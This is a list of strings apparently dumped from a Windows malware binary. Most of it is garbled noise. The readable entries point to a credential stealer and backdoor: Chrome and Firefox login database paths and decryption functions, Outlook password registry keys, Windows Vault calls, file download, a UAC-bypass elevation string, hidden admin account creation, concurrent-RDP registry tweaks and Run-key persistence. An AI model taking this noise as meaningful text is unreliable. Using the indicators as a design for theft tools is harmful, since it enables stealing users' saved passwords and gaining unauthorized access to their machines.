"{Pp`<", ",p'*Q", "2+UCG7", ",Pw'n", "Dj];x", "Polygon66", "IIIIYIIYIIIIIIYIIIIIIIIIIII", "lBA6pe\\", "hZ^1*5", "\\UUAf,", "]Ofq[", "_`pWVL", "L;JvS0\\t3h]", "P2:HII5", "Hs", "FObKk", "6bJ9J", "N57x<", "8^}W>K", "cP5XJP", ";C(vR", "HkKIxH", "t4dKg", "T2$wye", "Zz=0'", "Polygon29", "QWhP{B", "!_kO(&", "Polygon6", "RtlCreateUnicodeStringFromAsciiz", "_}X~c", "3\"III", "hXl|tZ", "tb}ij", "SX !)#", "fJ^d|jo", "PolyLine45", "zf{vaT", "EII2{III2RGII2", "FindFirstFileW", "TCVe}", "JJJJJJ", "AdjustTokenPrivileges", "bL~oR", "\\o!B'", "v9}VM!", "tDTyJ", "*r\"ku", ",W}y&F", "gHHHI", "5Kt-mWV", "^6mRQ", "m43!~.v6{", "UoFII", "u%%B ", ">.>9>?>N>T>^>d>h>", "dYD4l", "Il`Kx", " BBf9{", "LoadCursorA", "QWh UB", "k`&&A", "IN}pd^}P", "ppUL:", " 5f)3", "EDS#a", "q'vAjl", "`.rdata", "3hTin1C", "2nEII", "w4xT6*O", "Uu.\"@5", "R`}S7.b>*f,RL", "J(C5X'\"%", "J2CFII2", "/G|b?", "J*@#\"", "M`#WT", ";WjnY", "Ga}Zk<", "JJJJZ", "IA[je", "%~SO?", "2ZiG%", "v$jfC", "WQShp", "I=B$y", "\\97o@", "dZ\\7h", "BitBlt", "v5!a+G", "),+RE/W", "/zggb", "JJJJJJn>\\", "PathFindExtensionW", "t2-HII", "DPtoLP", "ZDW[%", "7>/ wI", "%G1GD", "J2O?II", "cfqV5", "7Clox", ":JU!3gB", "mK.pq", "<8=^=", "pJqdU", "WQ}cKu", "[%cn)", "Polygon92", "L+&%N", "$A rI~", "Gz?TiD", "%$@D-", "/|O~|", "M)Nc]", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIhI", "ezw2A", " ^Thg_7>", "QN)x{", "ds}XYk", "VnJY#vn", "QA$A\"", "Rh {2W", "{]hdb", "IIIIIIIIIIIIII?", "n0OF{", "aRdn[", "IUc+PG", ")Jz+4Q", "fBq?|", "D$@WP", "RtlEnterCriticalSection", "EyCo>2M", "RtlInitAnsiString", "B\"6{O=N-QZ", "4d^q;T", "J2YDIII", "LUJNU>", "O|N{sxS", "Kkart", "Fk4\\T", "ed}MA", "')eSr", "JoMJJ", "Nc#B1", "\"UpDAe", "&Pbv_", "p'Y{<", "NJJJ5Y", "`t8zIh", "158J7", "Polygon43", "`I)e*", "z(z3zGzR{\\{g{q{|{", "dt0*t", "ecNjt", "H_|iI", "l&!UY", "nJ%FH", "?vOj@_+", "lD|FQ~", "Could not decrypt", "\"22HII", "eG,tu0", "69iLT", "JUaI|", "2IHII5\\", "~mQ}o", "ZsvKR", "PolyPolygon93", "xdpoy~k", "^*4Sf", "S$^fF", "@SOFTWARE\\_rptls", "8xI$x", "2L'~@", "|a\\cgI", "!iKZP", "J2^AII", "?&o\\i", "i'^k$", "J2J=II", "cWOwz", "J2;7II", "y#y+y3y;yCyKzSz[zczkzsz{z", "F[BI.", "wi= x", "sqlite3_finalize", "!{b{zq=", "{aJr]", "QB", "/-__'", "l.+>g", "{){2{d|m|", "<{*7R", "GetSystemMetrics", "K]Sbb", "~-~5~;~A~N", "z!z%z)z9zY{a{e{i{m{q{u{y{}{", "]{tQz", "DIl\"Q7XG", "J;IJJ", "WgCd&V", "+xg_vl", "4O?%{", "g]%eiU", "WbgjM", "RtlInitUnicodeString", "H*J.u", "\".GW>a", "MJJJ2:", "RegQueryValueExW", "PolyLine46", "WbmY`e", "p12owWL6*", "7b65\"63", "J#IJJ", "7ptA'$+", "rIbx$$", "R?xu'", "q)|zG", "2iIIIvK", "W+g9W", "m7k09", "k\\wL^", "]_cUy", "?,o(n", "Vk!cm!", "|04(0m", "RegOpenKeyExW", "LoadResource", "OsZsz+", "mxp9fI", "q v[D", "kqy n", "|%|:|G|L}Y}^}k}p}}}", "yUCU2", "\\#cNF@", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\AddIns", "ZTPZ&KG", "{^v_g", "Polygon34", "TmwO|f", "!PC;Ba", "\\&{f[S", "CC5*8P", "mLcC P", "coRBt0", "QQSVWQ", ")unu?J", "itnQjY", "3QZJJ5/", "DMN1+~", "\"W7)_", "dwI[L", "rZ]8]1", "J\\65A", "}f;'%P", "'<=NdD", "XG2!B", "KMJ]I", "Sleep", "5hIZ&", "xR]", "__p__fmode", "URLDownloadToFileW", "IS/oJ", "JJJJIIIINJJJ", "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}", ">K+[9", "SMTP Password", "ODg(-P>", "0qM*waL", "t>>\"0", "0C2`c(?", "JR h{", "*6XP.+", "sIIIIIIII)I", "Polygon49", "Lj6*2", "VWh@\"@", "g6&Q\"", "TzsMI[", ".XX%YG]", "51HG=", "c&>gK", "JJIIIIKJJJ", "z`2|^", "5[1xs", "yky0Zc5", "x9y\\@LF", "9[[`k", "r`fon", "SbunVse", "?J9Z=9", "dOwfj", "OET.-[@", "[bX~j", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJ:", "rP#Tx", "k6", "rM[ W", ",OX++", "Copyright (C) 2000", "4hRZ0", "%2ekE=Ci", "xqO7x", "PolyLine27", "Ls`v%", "9`L7CCI", "dnJXKj", "KZKM|mV", "y8\\>U", "7.<]tf", "yUZtc", "RJJJKJJJJZ", "y!y@yHyVz", "F2#$II", "Kbqp]", "MjuhS", "4E9gKn", "]*()%@5YTGT3456TMOYTR56QW3$#57$#!@", "JJJJJv", "Dt|a^", " J$R;", "Pm(as#", "!XFfj", "w{Zskr", "*R8ds", "4mNP1", "\\Google\\Chrome\\User Data\\Default\\Login Data", "JJJJJJJ", "7j#WBn*", "User32.dll", "FriendlyName", "(h'}fu", "OF|O(", "6R7HI", "$[JX[2G", "W[`<'E(", "Wfzg*", "$X;`Z", "\\f\";L", "]2L", "t8WY)IZ", "bhp{LP", "J(IJJ", "NbK$2", "PolyLine39", "_ARH^", "IwIiInI", "!3X@V-", "s?ee-", "J2LAII", "yx\\,o", "J>IJJ", "/^kQh", "Polygon37", "LdrGetProcedureAddress", "4r/|+?[", "KogZk", "ih\\KAfAj", "tc[f;", "d*-ZX", "NSS_Shutdown", "=)JD#", "lstrcatW", "wcsstr", ". 8\"h}", "IngvIo0P", "86i#R", "LoadLibraryA", "JoIJJJY", "vx^\"D", "FlowerPower.EXE", "PolyPolygon", "GetModuleFileNameW", "\\OrQi\\:", "N!,|ja", "zbyQ_", "dUccK", "E2| Jy6", "t`up~", "cxK`M", "o+:wsB", "sMx:T", "466t`;", "PolyLine25", "be\\\\$sI", "l }U%M", "OB:go/", "pQmF4", "y(SFqf", "aA*m2e3", "UHxb8", "XxbN?WC", "dy[\\|", "'Fg4n", "f(X~j", "`R-\\z", "p>pbz", "PolyLine18", ":*:4:>:H:s:", ")RCcd", "0]axi3!>", "[f'RA", "^f#2c ", "'II5Y", "IkS\\~", "sPo0f", "iJ)h%E", "0kh1V", "!%8 l", ":u'c*", "nJu%O", ">4#S$V7", "H%s!p", "T\\W~h", "purfYk", "M`$D`<", "/;aF6x", "( X\\9", "dMwRJ", "]k^~/", "ReSfa", "~#~*~0~;~C~L", "PWhPcB", "L$,_^][d", "+zu`P~", "93kX(", "nKb&9H2", "*D7XI_^", "J2lCIII", "w_Rbe", "KLsM]rk", "UOr]wt", "b?(33", "OBJnG", "WX\\HA?", "06nQ>", "SELECT * FROM logins", ":rw7HK>", "[e[axI", "7#t~:", "IIIIVJJJ", "BRq2+p", "RRyh", "[whwt", "+~OL0p", "Polygon48", "vILo}", "$O$Mk", "R?yhf'", "2;III", "{#{z|", "3}PG*", "fipif", "GetWindowRect", "3&Ue@K", "Bqp@l", " '9HU~", "ZUxQZ", "IYJJ2\"EII", ",es6E", "Z&fC ?", "f]#_K", "TerminateProcess", "l|gmXI", "bJeZa", "IWU$3N", "rZTPr", "%$Q(^", "ByT;%", "HR_<7", "CII5Q", "rZ(8]-", "dZJIM", "I}Md-[BJ", "J'IJJ", "*/:=|", "(&1 ?", "MultiByteToWideChar", "a}b=0", "#?m,9", "\\+goA", "Uvg>#", "b?/LZ?", "piHJJ", "wLW`]", "UvdJdN", "E VM3", ">K#4(P", ">eIw/*0", "JPJJJ", "*W)dL`", "f=SI{", "VN~!1", "gSq8F", "]8_X[", "*w#SB", "2I(II", "&rg4xn", "lmO<.l", " W.C/jYY`", "GetTempPathA", "8x046", "R-afK", "_setmbcp", "Wz{si", "EMDP\\y", "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", "GetLogicalDriveStringsW", "qI6 VE9g", "a,Kr.-= I", "XAOT ", "o0ir%", "i_TqJo", "NetUserAdd", "?x5u&", "[O}n_{kb", "(|7@C~", "?C0+3", ")nz:p", "Polygon3", "WWf/iMp", "A{<_% ", "OfJfh", "v&]%f", "PYPcf", "8%ThL", "Mm&Smd", "5S77vm", "eIusK", "nOkpt", "%pjaf0", "8<,o,;", "VirtualAlloc", "{{kKuN", "|/|M}g}", "QRPPP", "p.,SC", "?i5xz", "7aqFA", "B2}GII", "xW^}a`", "Nn2HGII", "80-s1", "_.s)D", "JJJJJ.", "F286II", "z*4R<", "tG;HtsB", "1, 0, 0, 1", "XD7F)", "GHnY=?", ";DClB#", ",Qg.o", "!c`CB", ".g/F(v`", "PolyLine6", "15r^y", "69~`O/n", "A|gtE", "~S,-+", "Y[~j)", "?>0CZn\"GgVb", "!Wj5n|", "$ny;", ">\">)>l>", "E#~#W", "}lVvu", ".CRT$XCZ", "m-+i}", "O$Nl+", "{NU8d", "be}7O3", "VLK\"K", "?E?r?", "SHGetSpecialFolderPathW", "POP3 Server", "$DLxm", "2~GII", "~)|q9", "=o(%_w(", ",yOytql", "o#_!R", ")Rt]90", "UofwK", "#sq:v", "2+7II", "22{oGcC", "z'z2z", "%.3fvT]", "F%};&", "^g}v?", "^b'H4", "W6:`A", "lbmb|S", "hUR{^", "b2{9se", "p{S'S", "8E\\6]0", "eKjkB", "Ets~\"", "-JJIJ", "d\\\";5", "TZLXw{", "xn_68{", "tVkSS", "oVZ{f", "5\"X)i", "Iuo!y'", "C4I(!", "2 2%2*2/242?2R2`2s2", "/{'tz*", "jq#'\"", "Z4f5;k", ">n=}j", "L$,_^]", "UqUl*')", "OLEAUT32.dll", "ACnP(-j", "$TMFJ", "Polygon1", "Polygon", ")bd^Q-?", "Polygon18", "'3,Xo@7", "RhMCQ", "D>4xP", "FJJJJ", "QWh@wB", "ZN`HLM", "f4[jm=c", "CFfbxk", "2kHII", "b#MiqD", "B')bp", "F?jvG", "HIIrKJJ", "FwiZw", "lstrlenW", "SeDebugPrivilege", "2%7XL", "DnOy5", "tD; `Y", "i8]vo3f", "Polygon88", "vo\\hvc", "JLJJJ", ".rdata", "W5zL0=", "JSJJJ3jKJJIW", "L^e~M", "U:;Qu", "^+q36n", "f2X?@", "nxmx{", "&hJdB", "rNwY$", "qawx)e", "IoIJJJY", "WPSh8", "{jg/m", "HHH|H", "Polygon21", "@|jsl", "TK\"5t ", "_ba~J", "{X|a|q|y|", "e\\OeI", "h{V$8", "B}%2v", "@1^nz", "EACB[", "*&={'", "u; vv", "T2WGIIsQK", "V]$j\\4", "PWVWWWSh", "l&*YPU", ">G -3", "ETctZ", "3II5B", "nybgwh", "IoIJJJ", "&,fT0", "J2~GII", "*()%@5YTGT3456TMOYTR56QW3$#57$#!@1*()%@5YTGT3456TMOYTR56QW3$#57$#!@*()%@5YTGT3456TMOYTR56QW3$#57$#!@*()%@5YTGT3456TMOYTR56QW3$#57$#!@", "Nfogdk'", "#;/6z", "QQPQQ", "V&Dt>", "RWhPzB", "![MN\"", "JJJJJz", "2S;II", "0=0h0", "e4-6U$\"", "ZH5 oDB", "UIII9IIIWIII", "%HJj}", "N72Br", "Y9F(t", "^:e0XJ", "20+Y0", "mVbwlT", "BuN;QXy2", "1u)4=", "R`|IG", "*uUR#", "0=1^1", "y%y)y1y5y=yAyIzMzUzYzazezmzqzyz}z", "fJJJ2]BIII", "8g9v9", "cm^iQ5", "cufqn", "QmbOnZ", "ND$L\\", "EnableConcurrentSessions", "3}bJJ5%", "#C!4W", "HlGf:", "QueryServiceConfigW", "BottomFlowerPetal3", "CombineRgn", "b}Mmwuh", "JJJ2s", "PolyLine60", "w{\"E*", "HHHKH", "!p-yZ", "NetLocalGroupAddMembers", "Polygon58", "Z:IN!", "nss3.dll", "lF", "zGfze", "[2|4l", "mkOif=f", "DA!E(;", "7v+`![WmK", "&EM#@", "6bk.U", "Xn{rJ`", "Polygon19", "PolyLine57", "-|H(7", "|X5b@", "=2%}}]pmxm", "#0{8>", "`^=y1", "IcIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJII", "MSVCRT.dll", "O4|IW$u", "#GqzC", "e&>Um:J", "wM\"8PVj", "pRWud", "h/-91", "J:IJJ", "i}iL`", "f:jse", "SwhkQpm", "[S~d{", "An assertion condition failed", ",7N]]X", "0 0?0P0W0l0", "\"H.IZ$", "IIIIIIM", "(DFe:", "n\"4z?Z;", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII", "m+}\";", "0JJII", "~SjJ#$", "$iDlk=", "MJJJ=", "NvRoc", "N2WGII}", "j5]@q", "}^iksU", "JDIJJ", "@[Sk}X", "4|mw7", "V*'8;H", "JXxAX", "PK11SDR_Decrypt", "?IXc[p", "1ZBDbJI", "UIIIIIII", ",rO_A", "Mz2\\j6I", "J2o,II2", "w02!x", "&4z7FI", "O,5FH", "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "5OlcSxq", "m{F}dI", "'n<|.", "YoxJ,4", "StYgv_", "}!]\"S\"", "W-H%!\\h", "TYk{ ", "sbNt^", "J9IJJ", "n(680", "78`/E", "7HXr|\"", "A$B[B", "J2FY!", "PolyPolygon73", "GetWindowTextW", "X^q(2", "A9#Vq", "6`ylg", ".c+P1", "j]CE&", "K2\"JJJ5O}", "LeftFlowerPetal2", "B2k4II", "1TE#Y/", "toFII", "KJJJ2", "OMtGQ.", "7(7.74797?7I7U7b7i7n7z7", "M", "JJJJJj", "O\\LkO", "J2{?II", "Jdaxg", "%m\"GTe", "QStwU", "J5N'\"#8", "JmXcw", "Hk3!Q", "JJJJJn", "getaddrinfo", "O)9uMo", "S4/cf", "j?\":&&", "nN2TJJJ", "JJ==k", "PolyLine64", "DPE~R", "uea,#", "5II5B", "8,t8TY", "0)1z1", "L~pOu", "MaxConnectionsPer1_0Server", "JJJJ%-", "=K/x ", "O;*bi(a", "N^nb.", "6?^=]", "N%5lj", "tt^GBiE", "|adnm", "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "PolyLine67", "ybRVLY", "0)A.s", "mgohh", "'GFT!c", "SSShh", "eOQlWX", "7%7+757t7z7", "W5Rc(+", "rvKK]", ".b/1rI", "5+rSv", "E)Xd?D", "O\\M2gX^SYJ", "EJZJJ", "'k7S4<:", "&1nK ", ";n[o@m", "3VKcR*-N", "K`OLEAd", "`K/80", "tTKHk", "IYInI", "{BjTu", "IW/7:", "BH5ga", "Mkyv[", "nVoIIJJ", "GAB3y>", "/EYg+O", "ti_bq", "PeekNamedPipe", "ab28B", "GetProcAddress", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJ2", "J2h0II", "iA*5sPg9", "ImagePath", "MOXmQ", "rvKjS", "N2>@II", "GetForegroundWindow", "S;U n", ")!wnq", "HVUO$t", "-;_% (fp", "+]4Oj3", "*M#46a", "l ,\"Q", "o9(wI", "#JKs%", ".N[I?", "~~lxT", "J2?DII", "m0OW,L", "csi~\\J", "Z?5Zq", "oe21%4XD", "TVxMcx", "|QLMX", "-:?x_S", "YSq8I%U%x?", "tcrMyR", ".itext", "V(vEq", "JnaZb", "Polygon24", "$*II", "F2wFII", "JJJM\"", "!1+2;\\", "PolyLine3", "JCIJJ", "J2HEII", "%,JmK", "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "JGIJJ", "nXo`X", "Oqxkq", "9{4vt", "\"5e}%5a", "uu!$?", "Q(}*R8Or", "NPJ5r", "+y!P\" u", "aqT2t", "kernel32.dll", "X0`0d0,181", "RWh`4C", "pK|+&", ")\\gOE", "R^&z}/", "ZEV' ", "m`Xo?]p", "+vhoY}", ":\\:y:", "d^}R{{v", "PK5l2", "y^U:<`:S$^", ";/9Da{", "*]{1L", "nR2FEII5[{", "J2oDII", "};?Pu", "vbLOv", "G+_Oi", "cbw1o", "4)4E4a4p4", "0TX~|", "5s:]i", "crP,{", "f1CD`Y", "HHHJY", "WRShh", "<3&F=", "VQ&S!", "k MZd", "O:YIx", "1$1B1g1r1", "nsRuj", "nR)vn\"", "SP6j2MQ", "Polygon53", "PX9\\$<", "wf[Iw", "~=&C%", "{$ZAi", "hu[O~", "I{_qnt", "5V2WJJJ5O2", "b^C7%", "#gEV_", "ellocnak.xml", "39P\\~", "pc-s{", "^uH*h", "_J}~b", "Q8a3]-", "MS Sans Serif", "pciQfm", ":@;3h", "M\"(G\"", "n4yc2", "j+KAz", "J20CII", "]$?AeLG", "AVW%n`", "K?1I ", "2CHW5Iz", "u@3}~`l+V ", "T$TRP", "sqaju", "L$`_^d", "6%I-P", "\\FpQE", "D$$PQ", "S;MKb", "s$F}E", "cm{$Sx", "l&z>K|", "/#", "=|U(9", "CompanyName", "GlobalAlloc", "J3MJJJ", "D)eq6", "4O-\\%", "7fKWo", "6-6A6]6g6", ",JJJ2d:II5Y", "2#(II", "u*hh;@", "JIIuyyy}y-y5y9y=yAyUzYz]zazezizmzqzuzyz}z", "Qv[b)", "PK11_GetInternalKeySlot", "qR{G)", "B0)0iP", ";:;^;d;", "##w*w/", "KmiXvv", "vhPpP|", ",8Sr9", "~4u8w", "4.5D5", ";,rINF9", "A_;Cw", "n2i3y", "l +4u", "Zjeamn", "=VH#w%", "=h9h~", ".rsrc", "Aa7?F", "&mJoj", "{AhzyAoeg6OH", "ChJ=8", ";);\\;m;", "u,}9[", "abcdefghijklmnopqrstuvwxyzABCDEFGHIJK...", "__p__commode", "m}+W~", "I-={A", "p#^Qq", "3.373F3", "@M*TBFC", "3YjQr", "_D,n5GO", "J?IJJ", "oM^vMS", "=II5T", "\\N6>L", "b&>O*", "&yCx/(a", ".x))H?", ".8s,,", "D%+Ua", "b\\QYl", "_*!ZZ[", "gsLUm", "CKs4w", "IKuco", "MuaTohY", "[fRowX", "J2kAII", "RWh0mB", "2fEII5Y", "UP1+|", "mW8M=", "JU)7r", "4a&)n|BE", "lylKj", "0i>[", "IiIqInI", "2DHII", "|SP:3", "m2@ldLW", "ncW{^", "0(080A0H0", "05o@$", "AK7qVAkR", "MY3,A", ".text$mn", "M_S[mp", "3\"1=B6", "~0B22", "II", "/Rich3", "iE\"'F", "Polygon11", "O]ha~", "B?l^8?", "JrRI_hN", "nNIII", "y:Mc@", "3oWQ:r", "5S@H*", "&aeZ\\<", "aeu\\^", "w,/Fb", "Polygon81", "VaultCloseVault", "{J/ Xj", "gOs/k", "^Pky[_q", "=aTEs", "teF67}", "Polygon42", "^tA}M", "-+RXd", "vNwKp", ";4<^=", "fyo~jk", "O'{lw", "NJJKJ", "PolyPolygon78", "\\logins.json", "QWrYr", "8qI*,", "Lx|gY", "\"o.*oB", "L`JmWK", "-.K*7", "m)x*S", "w.t'&", "r;E_k", "4'=D/", "Polygon51", "JFIJJ", "JIIII", "SVWPh", "BottomFlowerPetal1", "vncEvent", "Xt>%M", "T0{4_", "dJzx&", "a41>u", ";/F7s-", "-H~Vmj", "2&232E2W2g2", "*3rKd", "b>_4:J", "PolyPolygon90", "#uvLr", "hlnVq", "'N1He", "JJZJ5V", "!IyUD", "C~%yc", "\"41umy", "Ra6K7r", ")+%55;", "qtk O%", ">5?O?~?", "xFqCb#", "e._cl5", ".8X(G|", "? liiK)", "FeC,j", "v5a=k", "(xj~fc", "PolyLine37", "zB]w'", "GetCurrentThreadId", "WM_DISP", "L'_h]", "~MgyrN", "Pag:`", "A#Zt0$", ",IJJJY", "k0_0pO/", "QK]lPJ", "7{5TUXN#<", "PolyLine12", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core", "KERNEL32.DLL", "7dgN4", "n/hVt", "gR(s&*", "0F0Z0", "IIIIIIKIOIIIiII", "IIoIJJJ", "P#:n4", "2k.II", "Polygon52", "&f~,W", "rOMKV", "VHqKn.", "#a<=O", "jA6'?=", ":>SH-", "Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "evkLSn", "jO!.K", "GFu0F", "^qIt9", "y8,/;", "|\\}h}", "u[?s|N", "|bceROz", "2%4II", "d7M}F", "]T_tgP", "Polygon60", ",qU`yd", "~g589", "L$TPV", "fwl]P", "L}`pr", "2pIII", "=4 ", "BBRETRY", "cwYyR", "D$N= pl~T", "0HR@2", "?H+Qg", "tfVmPP", "__set_app_type", " \\de?2", "A{b=^{", "+LP1Z", "jjjjj", "\\]taj", "+JJIJ", "Br%{q~", "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "\\Microsoft DN1", "=.=8===D=U=]=d=k=r=y=", "RegisterRawInputDevices", "mP\\|c", "`izm]", "[C,a1r", "o}VKY", "InitializeCriticalSection", "%ejI-", "J2T@II", "I.Xsma", "vpc`m", "WaitForSingleObject", "J)IJJ", "\"DWb@", "QWh KA", "}$}1}6}C}H}U~`~", "y)\\Y/&", "BN##ZNA", "PolyLine59", "Polygon56", "P51g?", "*:}C8", "jfT~g", "9NPu#", "C$d5(", "~L9,[", "yT@l\"", "7I[Bh", "%E$|S", "l7w", "GetClientRect", "Unknow", "-+O}e", "w\\fm;", "]Vi`i", "VaultOpenVault", "UJJJ=", "B!WDTv", ",*D)k!w", "vzMgPuP", "wEI8W", "CLOt?2", "m#VwA", "L$4_^]", "|N= F", "ImhMBP", "QWhPjB", "<`D5n", "T=~^Z", "}P04%", "XQ1(Q", "(SVW3", "RegEnumKeyExW", "R{aV\"", "JJJJJ~", "=s8S_6e", "zIRIcv", ";>Q9oi\"", "W>,lH4", "?Zy'Y", "AO`TY", "aut6V", "IIIIX", "jJJJIIIIMJJJ", "Eq~Za", "ZS}gm", "W=%1 )", "fv=z0B", "SHCreateItemFromParsingName", "DfN{)", "Y4ojR;", "sqlite3_column_type", "=m=t=", "3NTX|", "pcNZx", "; 7hJ--E;", "t41UN", "PACKAGEINFO", "8__\\}QE", "n;&R^w", "[zt\\RYx", "SetFilePointer", "sr8x+", "[kQmf", "?]ipYC", "msvcr", "\"~;K", "6jpG:", "~III2LCII", "Eob$D", "RIII}", "D4l|M", "%^1RL", "@!r?e", " ]h?!", "[f1`/)m", "N()`HB", "=q+1~", "$@$F73", "N7>!/", "ajRSL1", "zRy-J", "SSiKyv", ".idata$2", "F:E@o/", "|?,@%", "/#m\" ", "v^I<+", "I*()%@5YTGT3456TMOYTR56QW3$#57$#!@1*()%@5YTGT3456TMOYTR56QW3$#57$#!@*()%@5YTGT3456TMOYTR56QW3$#57$#!@*()%@5YTGT3456TMOYTR56QW3$#57$#!@*()%@5YTGT3456TMOYTR56QW3$#57$#!@1*()%@5YTGT3456TMOYTR56QW3$#57$#!@", "`juiZ", "q?Wez", "tQ@M{", "yLFhR", "A~9hL", "(>ep)j", "%R, 0", "Polygon50", "\"[4v=d", "gNQ^cr", "J,IJJ", "J27AII", "JRJJJ", "HTTP Password", "aUu\"u:F", "SetWindowRgn", "H>5*0xJ", "5`YBZ", "QXLLC", ")a:~:4", "h0qkOV'(", "~H!_\"#n:", "n0D0(", "33FHII", "{/QUu0", "WiUSC", ":2d6qT", "Polygon85", "?\\s7c", "SendMessageA", "tQc~Py", "a\"BK}:", "ehVe cZh", "=y", "(3RKJJ", ">-WFn0!}#", "~kgzRbRV", "[R&B<", "Vjzejd", "FH3GCQx", "&4$wk ", "b7'J ", "__dllonexit", " !n<}", "2!7II", ">0>P,", "/DdTC", "Gx3Nx", "WyJK_", "wxZ)6K[", "M\"0)s", "I;$9.$", "OP:E;", ":298II", "PolyPolygon82", "SetCurrentDirectoryW", "2eIII5", "Translation", "PK11_CheckUserPassword", "XWQ]Y!$\"", "\\Mozilla\\Firefox\\", "E:JdM", "UHHHI", "Polygon13", "gOW*12", "blsg%[g", "*}uU7", "2[ *;$", "!=5a;\\", "$mk}Uu", "V'v+fw", "X&]P,", "$'>WI", "9p\\x!", "GCB0x", "", "3>&JL", ")E*Uzz", "}}_$h", "%o{AC", "RegSetValueExA", "Nj)'M]", "KTQ!$", "JJJJJJJJJN", ";=;J;", "Z5!c/", "v;O)n", "Zo@HY1$U", "UJJ5/", "Polygon23", "1IIII", "eJ|X,", "sqlite3_close_v2", ")/y_N", "\"eRL]", "_Rytb", "#qcd;", "$,z?' ", "JOzrt", "D$$W3", "Xq)\\b", "|{VSm", "\\TUMM", "W$\">7.", "uWj{L", "ug5D'W{:'", "CopyFileW", "oz-T!;", "@v\"+.y", "2`FII", "PolyLine65", "PjeRl", "}TK}u\\", "Polygon9", "L=lws=", "m|3?a", "U0DuEP", "}uo.SX0", "ZxVab", "{CsI%", "oMm={", "ServiceDll", "U,l&+uhj", "'+Py`8", "K5TIK", "C}]k`", "2OJJJ", "\\sqlmap.dll", "Tk_VZ", "cN%B3p", "@vh1R", "~1+U?~4", "t", "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIo", "R\"e)1", "Polygon61", "RtlFillMemory", "a\"k^1", "9]>Te", "YtZdosJqz", "1oz{l", "O630I", "Gb)Gs", "HS$on", "IwIVISInI", "GIQJJ", "`I,Bn", "?28!II", "<'44E", "gsb~#QW", "jL}]M#", "GetCurrentDirectoryW", "F4D&?", "[%c1N", "/UXV^7e", "KPYwIY", "8&939", ";O0wY", "[rO`S", "x,65+", "{P*Hc", "Th0n?", "/8`~h!", "<>Ha|R", "k$R<'r", "Stb|lz", "C:\\Users\\louis\\Documents\\workspace\\MortyCrypter\\MsgBox.exe", "CryptStringToBinaryA", "cSR2]p", "~{C=h", "OKJJ2n", "PmS5_", "sqlite3_column_bytes", "DChx[l", "*9&Kh", "*~cN+s4", "8N*KzZO", "ZSU=4", "JJJ5L}%", "_~Y~B", "OqQaO", "PK11_Authenticate", "IIYIIIKIIMIIIIIIIMIIIIIIIIiJIIMIIIIIIKIIIIIYII", "be#x#", "BC9qj", "z]OK9P2", "_zJzN~", "p-SdWH", "PtVisible", "f/{gZ", "2&2:2U2", "J2bAII", "e`aVe~", "pLpC(;", "Hk.q|", "$9z;+.", "~KUtcnjN", "B(XL!", "rUf{`", "u.6k?", "IIIIMMIII", "xx5Y[", "qh431", "FHH1OKII", "_@6?y", "Polygon17", "2R!II", "F.D)n", "0@>^rF", "LJJJ2wGII", " !@Dl/;c *", "(C~3t", "GP=!$", "Kgit$h", "a0tOM*", "YtWf^", "'! 06", "Polygon22", "95:::H:n:{:", "+Eq{(", "PolyLine54", "In$&U", "@'bo\\", ":j !B", "w^#JI", ".g,y_S", "n^>f[", "\\B*-Zj", "@,*pAk1", "HnBpU7nA", "W9Sz9", "oaz\"^%~", "Jk_1Jp", "5ip|N", "{1m<_%", "rnjtsrtjns", "LcEc0", "^^A_K", "PPVh7", "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "sdnug", "_ftol", ":k}FJ", "32HII", "FPj@h", "B%A9pZ", "PolyLine23", "SetThreadContext", "v4xJyv", "[I?]cO8", "2+FII", "Mb8M4", "5r ie3", "Polygon89", "Gdww-", "1TQ[C", "Q9)]'", "_C=tzh", "3X/II5B", "8%XM9", 